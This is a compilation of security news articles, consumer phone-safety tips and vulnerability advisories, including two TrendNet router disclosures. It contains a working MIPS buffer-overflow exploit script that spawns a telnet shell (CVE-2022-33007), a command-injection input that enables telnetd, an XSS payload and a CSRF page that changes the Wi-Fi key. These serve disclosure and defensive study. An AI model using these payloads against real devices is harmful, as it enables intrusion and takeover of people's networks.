Your smartphone is your daily companion. The chances are that most of our activities rely on them, from ordering food to booking medical appointments. However, the threat landscape always reminds us how vulnerable smartphones can be. 
Consider the recent discovery by Oversecured, a security startup. These experts observed the dynamic code loading and its potential dangers. Why is this a problem?

Your smartphone is your daily companion. The chances are that most of our activities rely on them, from ordering food to booking medical appointments. However, the threat landscape always reminds us how vulnerable smartphones can be.

Consider the recent discovery by Oversecured, a security startup. These experts observed the dynamic code loading and its potential dangers. Why is this a problem? Well, the Google app uses code that does not come integrated with the app itself. Okay, this might sound confusing, but it all works in favor of optimizing certain processes. Thus, Google exploits code libraries pre-installed on Android phones to reduce their download size. In fact, many Android apps use this trick to optimize the storage space needed to run.

As revealed by Oversecured, perpetrators could compromise this retrieval of code from libraries. Instead of Google obtaining code from a reliable source, it could be tricked into taking code from malicious apps operating on the device in question. Thus, the malicious app could gain the same permissions as Google. And the latter giant typically gets access to your email, search history, call history, contacts, and more.

The scariest part: everything can happen without your knowledge. Let's discuss other spooky threats currently daunting mobile devices.

**Top Mobile Security Threats****Data Leaks**

When you download a new app on your smartphone and launch it, you must pay attention to the pop screen that appears. It is a permission popup, the request of providing a few permissions to the app. Sadly, granting extensive permissions to dangerous apps can have severe consequences. Hackers can hack the database where all this information is stored, and all your data can be leaked.

But, with some recent development in Android 11 and IOS 14, users can deny unnecessary permission requests or even grant them for one time only. Never give apps all the permissions, see what permission they need to run, and grant only those.

Therefore, it is crucial to protect the device by not using any public Wi-Fi hotspot. Remember, never get lured by a "Free Wi-Fi" hung hanged in any coffee shop, restaurant, or hotel.

**Spyware Pretending to be an Update**

Bug fixes, longevity, and overall safety boost are the three main reasons why you should always update your OS. However, there are cases when you must fight this instinct. If you find a random application called System Update, be wary of its true nature. As reported, this malicious Android threat pretends to be a system update. Sadly, its true intentions are much more sinister. Once installed (outside Google Play, which is already a dangerous practice), the app starts stealing victims' data. How? Well, it connects to the perpetrators' Firebase server, the tool used to take remote control of the infected device.

What can this spyware steal? Basically, anything. Your messages, contacts, browser bookmarks, and more are up for grabs. An even more frightening reality is that it can record phone calls, monitor your location, and steal photos.

**Malware via SMS Messages**

We all know the feeling of receiving bizarre SMS messages. But sometimes, such attempts are nothing but social engineering scams. A recently discovered TangleBot is one of the recent examples, stepping into the mobile threat landscape.

Apparently, the malware gets distributed via fake messages sent to users across the US and Canada. Mostly, they provide certain COVID-19 information and urge recipients to click on embedded links. If users click on the link, they are led into a website urging them to install an Adobe Flash update. If you decide to install it, TangleBot proudly enters your system. What can it do? Many things, from stealing data and taking control over certain apps.

**How to Defend Your Device?**

*   **Use updated operating systems**. Use only the latest operating systems like Android 11 and 12, as they have the newest security codes. However, install updates from reliable sources only. A random app floating online is not the right choice to keep your device up to date.
*   **Firewalls**. Always have a firewall securing your device. It works like a regular firewall. When your mobile device sends a request to a network, the firewall forwards a verification request to the network. Additionally, it contacts the database to verify the device.
*   **Be careful on app stores**. Even if you trust Google Play Store, do not install every app available. It is a known fact that many applications available are far from reliable. For instance, you could accidentally download cryptocurrency mining malware, banking Trojans, or intrusive adware.
*   **Use a VPN**. If you are in a position where you cannot avoid the use of public Wi-Fi, you need to download VPN apps. They will hide all your activities from hackers lurking on the network, and it will protect your sensitive information.
*   **Do not jailbreak your device**. iPhones can be somewhat restrictive. Thus, many might consider jailbreaking them to get the opportunity to customize their devices. However, a jailbroken smartphone is more vulnerable; you will likely lose your warranty and struggle to install the necessary updates.

**Conclusion**

The mobile threats are evolving with time, and they will keep on improving further as well. But that's not what we have to care about. The only thing that needs our concern is our security and privacy. Therefore, one must take all the precautionary measures to evade potential danger.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Overview of Top Mobile Security Threats in 2022

TRENDnet Wi-Fi routers TEW751DR v1.03 and TEW-752DRU v1.03 were discovered to contain a stack overflow via the function genacgi_main.

Vendor of the products:TRENDnet

Reported by: 　　　WangJincheng && FeiXincheng from X1cT34m

Affected products: TRENDnet TEW751DR <= v1.03 , TRENDnet TEW-752DRU <= v1.03

Vendor Homepage: https://www.trendnet.com/

Vendor Advisory: https://www.trendnet.com/support/support-detail.asp?prod=165\_TEW-751DR , https://www.trendnet.com/support/support-detail.asp?prod=170\_TEW-752DRU

**summarize**

The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the TrendNet Wi-Fi router firmware TEW751DR TEW-752DRU . In the genacgi_main function of the cgibin program, the sprintf method directly uses the service parameter from /gena.cgi. The attackers can construct a payload to carry out arbitrary code attacks.

**vulnerability description**

There is a stack overflow vulnerability in the genacgi_main function.

It calls the sub_40EC1C function.

However, in the sub_40EC1C function, it calls the sprintf function from a1 to v23 without any security check, which causes the stack overflow.

**poc**

    # python3
    from pwn import *
    from socket import *
    from os import *
    from time import *
    context(os = 'linux', arch = 'mips')
    
    libc_base = 0x2aaf8000
    
    s = socket(AF_INET, SOCK_STREAM)
    
    cmd = b'telnetd -p 7777;'
    payload = b'a'*462
    payload += p32(libc_base + 0x53200 - 1) # s0  system_addr - 1
    payload += p32(libc_base + 0x169C4) # s1  addiu $s2, $sp, 0x18 (=> jalr $s0)
    payload += b'a'*4 # s2
    payload += p32(libc_base + 0x32A98) # ra  addiu $s0, 1 (=> jalr $s1)
    payload += b'a'*0x18 # padding
    payload += cmd
    
    msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
    msg += b"Host: localhost:49152\r\n"
    msg += b"SID: 1\r\n\r\n"
    
    s.connect((gethostbyname("192.168.10.1"), 49152))
    s.send(msg)
    	
    sleep(1)
    system("telnet 192.168.10.1 7777")

CVE-2022-33007: CVE/bufferoverflow.md at main · fxc233/CVE

It's never been easier to switch between iPhone and Android—and to get your messages out of the Meta ecosystem entirely.

Since early 2016, WhatsApp has protected messages and conversations sent in its app with end-to-end encryption. This means that nobody other than the sender and receiver of messages can read their content—not even Meta can read or snoop on the contents of your conversations.

Despite WhatsApp being omnipresent—more than 2 billion people use it each month—securely moving your encrypted chats and photos to different platforms or apps has been a challenge. Transferring your WhatsApp chats from Android to iPhone and from iPhone to Android has historically only been possible using third-party apps. These apps are often fiddly and don’t necessarily protect your data at the level offered by WhatsApp’s ecosystem.

But in recent months WhatsApp has made it possible to officially switch between iPhones and Android (and vice versa), rolling out processes to securely move data between operating systems and working with phone manufacturers to enable the move.

If you’re fed up with Meta’s ecosystem, it’s also possible to move your groups and some chat data to other messaging apps. Here’s how to move all of your WhatsApp chats and backups.

Android to iPhone

Moving your WhatsApp account from Android to an iPhone involves a few steps. But it should be possible to bring most of your information with you: Your profile photo, individual and group chats, history, photos, videos, and settings can all make the jump from one device to another. Your call history and display name can’t be moved across, however, WhatsApp says.

Most of the work in moving your WhatsApp data comes before you make the shift. To move between devices, you need to ensure you have the same phone number on each. Before you start the process, make sure you have a recently updated version of WhatsApp on your Android phone. You also need to be running at least Android 5 on the device you’re moving from and iOS 15.5 on the iPhone you’re moving to. (The iPhone needs to be a new device or have been recently reset to its factory settings.)

Next, download and install the “Move to iOS” app from Google’s Play Store—this Apple-owned app will do all the heavy lifting. When you’re ready to migrate your data, plug both devices into a power source and connect both phones to the same Wi-Fi network. (If you don’t have a Wi-Fi network, it’s possible to use a hotspot to connect your Android phone to the iPhone.)

When both phones are on the same network, open up the “Move to iOS” app on the Android phone and follow the instructions to connect the two phones. Then select WhatsApp as the data source you want to transfer from, and the app will prepare your chats to be moved across—final prompts will confirm you want to make the switch.

This process will log you out of WhatsApp on your Android phone, and you’ll need to download the app on the iPhone you are moving to. When you first use WhatsApp on this iPhone, it’ll ask you to use the same number as on the Android device and prompt you to complete the transfer process. When the process is complete, if you are getting rid of your old phone, make sure to do a factory reset and wipe all your data.

iPhone to Android

It’s been possible to transfer your WhatsApp chat history from iPhones to Android devices since October 2021. This transfer process includes your photos, messages, voice messages, and group conversations.

The compatibility was first rolled out for Samsung phones but has since expanded to include Google Pixel phones and all devices running Android 12. To make the move, you’ll need a USB-C-to-Lightning cable to physically connect the two devices, Google explains. “When prompted while setting up your new Android device, scan a QR code on your iPhone to launch WhatsApp,” the company says in a blog post. Alternatively, in WhatsApp you can go to **Settings** > **Chats** > **Move Chats to Android** and follow the transfer prompts.

WhatsApp’s guide to moving your chats between iPhones and Samsung devices says you will need the Samsung SmartSwitch app installed on the new phone and the same phone number on both devices. As with moving from Android to an iPhone, make sure you delete or wipe your old phone if you’re getting rid of it.

WhatsApp to Signal

Signal is widely considered the best messaging app for security and privacy. Check out our guide to switching your text messages to Signal and moving your messages between devices. While you can’t directly move your WhatsApp chat history to Signal, there are some things you can do to make the switch more straightforward.

It’s possible to easily recreate your WhatsApp groups on Signal—although getting all your family and friends to ditch the Meta-owned app may be more of a challenge. To recreate your groups, open the Signal app and start a new group by tapping the **pencil icon**. When you are asked to add people from your contacts, **tap on Skip** and instead pick the option to get a link to invite people to the group (a QR code is also available). From here, you can share this link with your WhatsApp chats and allow people to move over.

WhatsApp to Telegram

Unlike Signal and WhatsApp, Telegram is not end-to-end encrypted by default. As a result, security experts often warn against using Telegram. However, if you still want to use Telegram, it’s possible to move your chat history from one app to the other.

On both iOS and Android, open the chat you want to move to Telegram and click on the chat’s name or details (using _⋮_ on Android). From here, tap **Export Chat** and when you get the choice of where to **share** the chat, pick Telegram. When exporting chats from WhatsApp to Telegram, you have the choice to take photos and videos with you, or just chat messages.

Back up your WhatsApp chats

You can also back up your WhatsApp conversations in the cloud. This allows you to keep your messages and photos safe if you’re moving from one iPhone to another iPhone or Android to Android—for instance, if you upgrade or break your device and replace it with one using the same operating system.

Until September 2021, WhatsApp didn’t end-to-end encrypt backups, creating a potential security risk and exposing people’s chats to requests from law enforcement. However, the company has since closed that loophole, so it’s now much less of a risk to have your chats backed up to iCloud or Google’s Cloud. To back up to either platform, you will need a Google Drive account or an iCloud account.

On Android, in WhatsApp go to **More options** > **Settings** > **Chats** > **Chat backup** > **Back up to Google Drive**. While on iOS go to WhatsApp **Settings** > **Chats** > **Chat Backup** > **Back Up Now**. You’ll then be able to set the frequency of your backups and elect whether data-heavy videos are included.

How to Move Your WhatsApp Chats Across Devices and Apps

The spyware has been used to target people in Italy, Kazakhstan, and Syria, researchers at Google and Lookout have found.

In hearings this week, the notorious spyware vendor NSO group told European legislators that at least five EU countries have used its powerful Pegasus surveillance malware. But as ever more comes to light about the reality of how NSO's products have been abused around the world, researchers are also working to raise awareness that the surveillance-for-hire industry goes far beyond one company. On Thursday, Google's Threat Analysis Group and Project Zero vulnerability analysis team published findings about the iOS version of a spyware product attributed to the Italian developer RCS Labs.

Google researchers say they detected victims of the spyware in Italy and Kazakhstan on both Android and iOS devices. Last week, the security firm Lookout published findings about the Android version of the spyware, which it calls “Hermit” and also attributes to RCS Labs. Lookout notes that Italian officials used a version of the spyware during a 2019 anti-corruption probe. In addition to victims located in Italy and Kazakhstan, Lookout also found data indicating that an unidentified entity used the spyware for targeting in northeastern Syria.

“Google has been tracking the activities of commercial spyware vendors for years, and in that time we have seen the industry rapidly expand from a few vendors to an entire ecosystem,” TAG security engineer Clement Lecigne tells WIRED. “These vendors are enabling the proliferation of dangerous hacking tools, arming governments that would not be able to develop these capabilities in-house. But there is little or no transparency into this industry, that's why it's critical to share information about these vendors and their capabilities.”

TAG says it currently tracks more than 30 spyware makers that offer an array of technical capabilities and levels of sophistication to government-backed clients.

In their analysis of the iOS version, Google researchers found that attackers distributed the iOS spyware using a fake app meant to look like the My Vodafone app from the popular international mobile carrier. In both Android and iOS attacks, attackers may have simply tricked targets into downloading what appeared to be a messaging app by distributing a malicious link for victims to click. But in some particularly dramatic cases of iOS targeting, Google found that attackers may have been working with local ISPs to cut off a specific user's mobile data connection, send them a malicious download link over SMS, and convince them to install the fake My Vodafone app over Wi-Fi with the promise that this would restore their cell service.

Attackers were able to distribute the malicious app because RCS Labs had registered with Apple's Enterprise Developer Program, apparently through a shell company called 3-1 Mobile SRL, to obtain a certificate that allows them to sideload apps without going through Apple's typical AppStore review process.

Apple tells WIRED that all of the known accounts and certificates associated with the spyware campaign have been revoked. 

“Enterprise certificates are meant only for internal use by a company, and are not intended for general app distribution, as they can be used to circumvent App Store and iOS protections,” the company wrote in an October report about sideloading. “Despite the program’s tight controls and limited scale, bad actors have found unauthorized ways of accessing it, for instance by purchasing enterprise certificates on the black market.”

Project Zero member Ian Beer conducted a technical analysis of the exploits used in the RCS Labs iOS malware. He notes that the spyware uses a total of six exploits to gain access to surveil a victim's device. While five are known and publicly circulating exploits for older iOS versions, the sixth was an unknown vulnerability at the time it was discovered. (Apple patched that vulnerability in December.) That exploit took advantage of structural changes in how data flows across Apple's new generations of “coprocessors” as the company, and the industry overall, moves toward the all-in-one “system-on-a-chip” design.

The exploit isn't unprecedented in its sophistication, but Google researchers note that the RCS Labs spyware reflects a broader trend in which the surveillance-for-hire industry combines existing hacking techniques and exploits with more novel elements to gain the upper hand. 

“The commercial surveillance industry benefits from and reuses research from the jailbreaking community. In this case, three out of six of the exploits are from public jailbreak exploits,” TAG member Benoit Sevens says. “We also see other surveillance vendors reusing techniques and infection vectors initially used and discovered by cyber crime groups. And like other attackers, surveillance vendors are not only using sophisticated exploits but are using social engineering attacks to lure their victims in.”

The research shows that while not all actors are as successful or well known as a company like NSO Group, many small and midsize players together in a burgeoning industry are creating real risk for internet users worldwide.

Google Warns of New Spyware Targeting iOS and Android Users

By Deeba Ahmed
Most people today depend on their phones entirely. Aside from being a portal to our social life, they…
This is a post from HackRead.com Read the original post: 5 Tips for Protecting Your Phone from Malware

Most people today depend on their phones entirely. Aside from being a portal to our social life, they also make our lives easier in many ways. One of the best things probably is paying with them and having the chance to check our bank account through them.

Connectivity to every area in our lives is also a target for hackers. Having our bank accounts and everything else on our phones drives criminals to try and get inside the software. We need to be fully protected and ensure no malware is installed on our phones.

In this article, we’re sharing some tips that will help ensure you’re safe. We will show you how to avoid installing malware and how to stay protected. Follow up and see what you must do if you want to avoid being a hacker’s target.

**1\. Download only trusted apps**

You can install malware by simply downloading a malicious app. Before downloading anything, you must do a background check on the app you’re about to download. Ensure the trustworthiness and see if the company behind it has a proven track record of providing safe products.

If you’re a business that develops apps, you must hire a product strategy consulting company and let them do everything in their power to turn your app into a trusted source for your clients. Without this, consumers will see your app as a potential threat and won’t download it.

**2\. Always update your OS and apps**

Outdated software is bait for hackers. It is seamless for hackers to intrude and damage your phone or steal vital information if you’re using outdated software. When you’re not updating, the backdoor entrances are wide open for hackers, who can easily use them to harm you.

When you have everything updated, the new versions block everything and everyone trying to intrude. No worm or virus will be able to access your data, which means you’re safe from malware issues, and you can rest assured you’re not getting attacked while you’re not watching.

**3\. Don’t open suspicious emails and files**

Emails are filled with phishing scams and files from unknown sources that may harm your phone. Computers usually have firewalls and antivirus or antimalware programs to detect such threats, but phones are rarely equipped with this kind of technology.

Don’t open all kinds of emails and files on your phone. If you open something like this on your phone, everything may get erased, and hackers may intrude into your bank accounts quickly. Save this action for your computer, where you’ll be much better protected.

**4\. Avoid using open and unsecured Wi-Fi networks**

Unprotected open Wi-Fi networks in public areas are almost constantly a target of pro or amateur hackers. They will invade everyone connected to the network and easily get inside your phone and install malware. When you see your phone downloading stuff on an open network, stop doing it immediately.

You can never know what’s being installed on your phone. Instead, turn off your Wi-Fi connection, and wait for a better time to update your software. Your phone won’t push the downloads if you’re connected through your data.

**5\. Do often scans and checks for malware and other threats**

Multiple programs and software are available for scanning and checking for malware, viruses, and everything else that may be damaging your phone. Search online for the best options and do regular checks.

You can schedule them to do this automatically or activate a quick scan when you have the time for it. Like there are antivirus programs for computers, there are for phones. They work the same and will clean your phone from harmful software.

**Conclusion**

You need to always be sure that you’re not hacked by someone. It’s too easy for someone to install devastating malware on your phone if you’re not careful. Therefore, you need to follow the instructions we talked about above.

If you follow the instructions, no one will be able to kidnap your phone and use the data on it. Your entire life is in your smartphone, so don’t let anyone get access to it. Stay protected by always having these tips in mind.

5 Tips for Protecting Your Phone from Malware

Comodo Antivirus 12.2.2.8012 has a quarantine flaw that allows privilege escalation. To escalate privilege, a low-privileged attacker can use an NTFS directory junction to restore a malicious DLL from quarantine into the System32 folder.

CVE-2022-34008: Download Free Antivirus Software | Get Complete PC Virus Protection

Security defenders working for large venues and international events need to be able to move at machine speed because they have a limited time to detect and recover from attacks. The show must go on, always.

Live events such as concerts and sports games are generally chock-full of action, both on the field and behind the scenes. IT and security teams managing these venues navigate a complex environment that includes a traditional corporate infrastructure, special equipment required for the event, a large army of suppliers and contractors, and all of the devices brought in by spectators. And the prospect of a cyberattack during the actual event always looms large.  

Securing live events can be the most complicated and most complex to protect, says Karim Benslimane, director of cyber intelligence at Darktrace. Running a stadium can be split into a “business perspective,” which is akin to managing the technology infrastructure for a very large enterprise, and the “event perspective,” which includes all the people and equipment involved with setting up and hosting the event itself.

“When there is no event doesn’t mean the IT guys don’t have anything to do,” Benslimane says. “They are already busy running the business.” He speaks from experience. Prior to joining Darktrace, he was head of information and communications technology and cybersecurity for various international venues and events.

**Understanding the Cyber Paradox**

The business infrastructure depends on much of the same technologies and enterprise applications – Active Directory, telephony, wired and wireless networking, ERP, CRM, databases, and e-commerce applications, to name just a few – as a large organization  requires to manage the day-to-day operations. Payroll needs to make sure people are paid, employees need to be able to communicate internally and with clients and customers, and tickets have to be printed and sold.

The event has its own infrastructure, and managing the event requires a completely different mindset because of what Benslimane refers to as the “cyber paradox.” The traditional security mindset is to deploy technology and control to add layers to make it harder for attackers to access systems and restrict what is added to the network. Setting up an event, by definition, involves hiring suppliers and contractors (along with their sub-suppliers and subcontractors) who bring their own assets and need access to the venue’s infrastructure, such as VoIP and Wi-Fi. For example, the venue may own the jumbo screens, but the immersive elements and special effects that make the event come alive are pushed onto the screens from third-party systems.

“From a cybersecurity point of view, it’s obviously a paradox where you are trying to secure your assets on the left, but on the right, you are forced to allow external people and external devices to come physically into your venue and use your infrastructure,” Benslimane says. It doesn’t make sense to talk about securing the perimeter when people are already inside, he notes.

On top of that is the live event itself, or “D-Day,” which requires letting even more people physically enter the venue with their own devices and access services such as Wi-Fi.

“It was a big challenge. You have nothing to control and protect you,” Benslimane says.

**Limited Time to Respond**

As the saying goes, the show must go on. Security teams in the events industry have to “rush and run” to mitigate security incidents as they occur so that the event can go off as scheduled and associated services (such as broadcasts and streaming contracts) are not impacted.

“If something happened during the 100-meter men’s final \[at the Olympics\] or the \[FIFA\] World Cup final, think about the brand impact,” Benslimane says. Interrupting the broadcast would mean millions of TV and screens will see a black screen, which would result in immense financial losses for the brand. There will be penalties from lost advertising. This would also affect the host country’s reputation.

Those were the same challenges Wired reporter Andy Greenberg wrote about in his book about Olympic Destroyer, the malware that knocked out the domain resolvers during the opening ceremonies. As a result of the attack, some attendees couldn’t print tickets to enter the stadium, the Wi-Fi network was offline, TVs around the stadium and other facilities could not show the ceremony, the RFID-based security gates for Olympic facilities were not working, and the official Olympic app was broken. If the systems remained offline after the opening ceremony ended, athletes, visiting dignitaries, and spectators would find they had no access to the Olympics app full of schedules, hotel information, and maps. 

“The result would be a humiliating confusion,” Andy Greenberg wrote for Wired.

Attackers realize that events can’t be delayed and take advantage of that time constraint to cause the most damage, Benslimane says. There is no time to recover when the match ends in a few minutes.

**Holding the Event Hostage**

Ransomware attacks encrypt documents and make it hard for organizations to function. A ransomware attack on a live event cripples the technology and interrupts the show. Cybercriminals clearly understand that the venue cannot postpone, or replay, D-Day. Imagine if a cyberattack disrupted the systems to the point that the game cannot continue, and the venue asks the crowd to leave and come back next week. 

“Just imagine the fights,” Benslimane says.

Organizations rely on the metrics MTTK (mean time to know) and MTTR (mean time to repair) to identify, investigate, and mitigate the incidents. Those metrics highlight the challenges facing live events because the clock is already ticking. If the security team takes more than 10 or 15 minutes to detect and investigate an incident, that is already halfway through the first half of the game and the halftime show is coming up, Benslimane says. This is the biggest advertising window, and not being able to broadcast the ads would be a significant blow to the organization, which makes it even more likely that these venues would pay the ransom.

“The cybercriminals clearly understand that if something happens during D-Day, there won’t be enough time to respond,” Benslimane says.

**Moving Faster than the Attackers**

Attackers move faster than defenders, which makes it difficult for security teams to respond during an event. For defenders to be able to respond effectively, they need to be operating at machine speed, which means using artificial intelligence (AI) as part of the security response, Benslimane says, noting that he deployed Darktrace’s technology in his past roles. The AI can look at all of the events happening in the network and correlate them quickly to identify which issues are problematic. If the investigation finds that the issue is actually not a problem, then the AI doesn’t take any action. And if there is an issue, the AI already has the information it needs from the investigation to neutralize the threat and remediate, such as by blocking a particular connection or isolating the affected system.

The AI is like a “sponge” for knowledge. 

“As long as you put in water, the sponge will absorb it. The AI brain will absorb everything you give it,” Benslimane says.

Speed is paramount for detection, investigation, and making the decision on how to respond, especially when the environment is complex and constantly evolving. The infrastructure for a live events venue is not static, so the AI is constantly learning, analyzing, and making decisions.

The AI is “much faster than 1000 cybersecurity guys in a SOC – even if it’s the best SOC in the world,” Benslimane says.

Security Lessons From Protecting Live Events

Vacationing has never been more welcome. But as you plan your itinerary, make sure your devices are secure and your data stays private.
The post Internet Safety Month: 7 tips for staying safe online while on vacation appeared first on Malwarebytes Labs.

Going on vacation has never been more talked about and anticipated. I mean—for many of us, it’s been a while.

But before you get lost in dreamy thoughts of sun, sea, and sand, you might want to set aside some time to plan on how to keep your devices, and your data, safe while you are relaxing

**Your devices need some prepping, too**

Before anything else, know which devices you’ll bring and which ones you’ll leave at home. Then make backups of the files in them.

This is also the perfect time to look deeper into what’s on your devices, especially if you haven’t done any spring cleaning due to busyness. So update those apps that need updating and uninstall those that waste space; scan your devices with a trusty malware scanner, and change any duplicate passwords. Then follow these tips:

**7 security and privacy tips that fit in your pocket**

**Ensure your devices have the “Find My Device” feature enabled.** This feature isn’t just limited to Apple products, and can really help if you lose your device. You can remotely wipe a device if you lose it or even put a message on the screen with contact details in case it is found.

**Be mindful of seasonal scams.** Such scams may arrive via email, SMS, or social media. If a service offers rates that are too good to be true, asks for an upfront fee, or demands payments to be wired, avoid it.

**Use 2FA.** Make sure you lock your accounts behind two-factor authentication (2FA). This additional security measure makes them harder to compromise should someone get hold of your login details.

**Turn off Bluetooth connectivity.** Many people forget Bluetooth is there. As a rule of thumb, remove it if you don’t use it. But if you can’t, disable it when it’s not in use.

**Leave your device in the hotel’s safe.** Hotel safes are there to keep anything of value safe. This includes your devices. When you’re not using a device, keep it in the safe—and remember the pin code!

**Refrain from posting on social media about your vacation.** This is good practice _before_ you leave as well. You don’t want people knowing that your home will be empty, so save posting about your getaway until you are back home.

**Feel free to use a VPN.** Hotel and airport Wi-Fi is safer now than years ago, thanks to HTTPS everywhere. But if you still can’t shake the feeling of being “exposed,” use a VPN you trust. Malwarebytes has one.

Internet Safety Month: 7 tips for staying safe online while on vacation

An issue was found on TRENDnet TEW-831DR 1.0 601.130.1.1356 devices. An OS injection vulnerability exists within the web interface, allowing an attacker with valid credentials to execute arbitrary shell commands.

The Trendnet TEW-831DR WiFi Router was found to have multiple vulnerabilities exposing the owners of the router to potential intrusion of their local WiFi network and possible takeover of the device.

Five vulnerabilities were discovered. Below are links to the associated technical advisories:

*   Technical Advisory: Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)
*   Technical Advisory: Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)
*   Technical Advisory: OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)
*   Technical Advisory: CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)
*   Technical Advisory: Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)

Technical Advisories:

**Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30326  
Severity: Medium 5.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the network pre-shared key field on the web interface is vulnerable to XSS.

**Impact**

An attacker can use a simple XSS payload to crash the main page of the router web interface.

**Details**

Stored XSS is a vulnerability related to improper validation of user input and output. In stored XSS the web interface accepts input from the user and stores it for later without proper encoding. A web application that is vulnerable to XSS allows an attacker to send a malicious script to the user.

The example below will crash the basic\_conf page and create a popup on the 5G home.htm page:

    <input type="text" name="pskValue0" id="pskValue0" size="30" maxlength="64" value="<script>alert(1)</script>">

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30328  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the router web interface has an insecure username and password setup.

**Impact**

A malicious user can change the username and password of the interface.

**Details**

The username and password setup for the router web interface does not require entering the existing password. An attacker can use CSRF to trick the user to send a request to the web interface to change the username and password of the router.

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners should logout of the device web interface after use.

**OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30329  
Severity: Medium 6.3

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that commands could be injected into the diagnostics field within the web interface.

**Impact**

An OS injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to execute arbitrary shell commands.

**Details**

The web interface has a diagnostics page that uses ping/traceroute. In the host(domain) an attacker can enter an IP with a ; at the end and inject a command to be executed by the device. Using command injection telnetd can be enabled. Telnetd is a remote terminal protocol server.

For example, the following can be entered into the host(domain) to enable telnetd:

    192.168.10.02;telnetd &

After running the command, any telnet client can be used to login to the root account from the local area network (LAN):

    user: root
    Password: the admin password 

Running the ls command will list the files in the current directory:

    bin   etc   init  mnt   root  tmp   var
    dev   home  lib   proc  sys   usr   web

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30327  
Severity: High 7.6

**Summary**

Trendnet TEW-831DR WiFi router is a general consumer WiFi router with a web interface for configuration. It was found that the routers browser interface is vulnerable to CSRF.

**Impact**

The WiFi router interface is vulnerable to CSRF. An attacker can change the pre-shared key to the WiFi router if the interface IP is known.

**Details**

Cross-Site Request Forgery is an attack that occurs when a user interacts with a malicious web application while logged into a vulnerable web application using the same browser. The malicious web application can send unwanted requests to the vulnerable web application.

If the user is logged into the router web interface an attacker could create a page like the example below and trick a user into clicking it to change the router WiFi pre-shared key or SSID.

e.g.:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.10.1/boafrm/formWizard" method="POST">
    
          <input type="hidden" name="pskValue0" value="password" />
          <input type="hidden" name="pskValue1" value="password" />
          <input type="hidden" name="cliPskValue0" value="password" />
          <input type="hidden" name="cliPskValue1" value="password" />
          <input type="hidden" name="apply" value="Save &amp; Apply" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30325  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the default pre-shared key for the WiFi networks is the same for every router but the last four digits.

**Impact**

The device default pre-shared key for both 2.4GHz and 5GHz networks can be guessed or brute-forced by an attacker within range of the WiFi network. The weak pre-shared key allows the attacker to gain access to these networks if the pre-shared key has been left unchanged from the factory default.

**Details**

The device default pre-shared key has the same seven out of eleven digits for every router. An attacker within scanning range of the WiFi network can brute-force the last four digits to gain access to the network.

e.g.:

    The first seven default characters of the pre-shared key:
    831R100

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners that are still using the default pre-shared key should update the current wifi key to new one through the web interface.

**Disclosure Timeline:**

March 15th, 2022: Initial email from NCC to Trendnet.

March 16th, 2022: Trendnet responded to the initial email.

March 18th, 2022: First communication of the bugs to Trendnet. Set the disclosure timeline to 60 days.

May 5th – May 23rd, 2022: Multiple emails exchanged to complete the fixes on the firmware version.

May 23rd, 2022: Trendnet confirmed the fixes were present in the firmware to be released.

June 2nd, 2022 – Trendnet released firmware version:v1.0(601.130.1.1410).

**Thanks to**

Nicolas Bidron, Jennifer Fernick, and David Goldsmith for their support throughout the research and disclosure process. Additionally, Trendnet for their on going cooperation.

**About NCC Group**

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

CVE-2022-30329: Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)

